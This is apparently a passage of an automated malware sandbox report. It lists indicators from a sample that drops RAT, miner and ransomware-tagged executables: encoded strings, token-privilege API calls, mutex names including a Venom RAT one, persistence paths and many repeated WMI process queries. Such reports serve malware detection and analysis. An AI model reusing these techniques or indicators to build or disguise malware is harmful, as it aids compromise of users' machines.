'H4sIAAAAAAAEAItJColO1K1y1I0y0LWMrTay0DE2ro1JAgCQuGQ4FwAAAA==', 'H4sIAAAAAAAEAItJKjGMNtC1dNStiq02Nq6NSQIA8OfYfRIAAAA=', 'H4sIAAAAAAAEAItJ0kjKS9LUiE7UrTLQtYytNras1YxJAgAS93gFFwAAAA=='
                      Source: accc.exe.5.dr, FlkCRXUvHcR.csBase64 encoded string: 'H4sIAAAAAAAEAAvOTyspTyxKjfHNTC7KLwbyYsIz81Lyy4tjnEuLilLzSsJSi4oz8/NigkrzAHLTHVUtAAAA'
                      Source: accc.exe.5.dr, yfwLUpaytDvy.csBase64 encoded string: 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0EvJydFLzs8tKEotLk5NAQBlAxhYIAAAAA==', 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0CtISdJLzs8tKEotLk5NAQBhsDSUIAAAAA=='
                      Source: accc.exe.5.dr, GGHFLhBdcqzlyt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: accc.exe.5.dr, GGHFLhBdcqzlyt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 53A5.tmp.update.exe.2.dr, QAeLOkPOHZsV.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 53A5.tmp.update.exe.2.dr, QAeLOkPOHZsV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 5E16.tmp.aaa.exe.2.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 5E16.tmp.aaa.exe.2.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 4336.tmp.Server.exe.2.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 4336.tmp.Server.exe.2.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 476D.tmp.Server.exe.2.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 476D.tmp.Server.exe.2.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 5087.tmp.update.exe.2.dr, QAeLOkPOHZsV.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 5087.tmp.update.exe.2.dr, QAeLOkPOHZsV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3CBD.tmp.Installer.exe.2.dr, GGHFLhBdcqzlyt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 3CBD.tmp.Installer.exe.2.dr, GGHFLhBdcqzlyt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 4BC4.tmp.Client.exe.2.dr, Help.csSuspicious URL: 'https://api.vimeworld.ru/user/name/'
                      Source: classification engineClassification label: mal100.rans.phis.troj.adwa.spyw.evad.mine.winEXE@97/413@19/15
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A18878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,FindCloseChangeNotification,free,0_2_00007FF68A18878C
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A1820C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,0_2_00007FF68A1820C0
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA33878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,free,47_2_00007FF6AA33878C
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA3320C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,47_2_00007FF6AA3320C0
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B0878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,free,52_2_00007FF7C9B0878C
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B020C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,52_2_00007FF7C9B020C0
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE48878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,free,53_2_00007FF7AE48878C
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE4820C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,53_2_00007FF7AE4820C0
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,free,55_2_00007FF7C07C878C
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C20C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,55_2_00007FF7C07C20C0
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A187530 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF68A187530
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A187C00 SHGetFolderPathW,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00007FF68A187C00
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zbi[1].exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                      Source: C:\Windows\System32\relog.exeMutant created: \Sessions\1\BaseNamedObjects\ZBI
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                      Source: C:\ProgramData\KMSAuto\accc.exeMutant created: \Sessions\1\BaseNamedObjects\uUZipryfJK9orC6woTsFlhMErVY1f77z
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeMutant created: \Sessions\1\BaseNamedObjects\Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\qV8NRtqxj5c3
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeFile created: C:\Users\user\AppData\Local\Temp\SystemUpdate.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""
                      Source: xj40xovMsm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: xj40xovMsm.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 43.44%
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
